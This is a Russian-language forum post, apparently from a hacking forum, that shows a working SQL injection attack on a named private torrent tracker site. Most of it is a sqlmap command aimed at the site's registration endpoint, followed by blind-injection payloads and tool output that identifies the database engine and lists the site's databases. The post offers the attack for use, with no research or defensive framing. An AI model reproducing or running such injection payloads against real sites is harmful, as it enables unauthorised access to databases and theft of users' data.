Пожалуйста, обратите внимание, что пользователь заблокирован
Продолжим тему торрент-трекеров. На этот раз "приватный" ресурс.
Скрытый контент для зарегистрированных пользователей.
Код:
sqlmap.py -u "https://softpilot.win/ajax.php" --data="action=user_register&form_token=&mode=check_invat&user_invat=-1'%20OR%203*2*1=6%20AND%20000272=000272%20--%20" --random-agent --risk=3 --level=5 -dbms=mysql -dbs
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: action=user_register&form_token=&mode=check_invat&user_invat=-1' OR 3 HAVING 9783=9783-- Efjw21=6 AND 000272=000272 --
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=user_register&form_token=&mode=check_invat&user_invat=-1' OR 3 AND (SELECT 5661 FROM (SELECT(SLEEP(5)))IxYx)-- tNvv21=6 AND 000272=000272 --
---
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 3
INFO] resumed: information_schema
[INFO] resumed: test
[INFO] resumed: torrnada_club
available databases [3]:
[*] information_schema
[*] test
[*] torrnada_club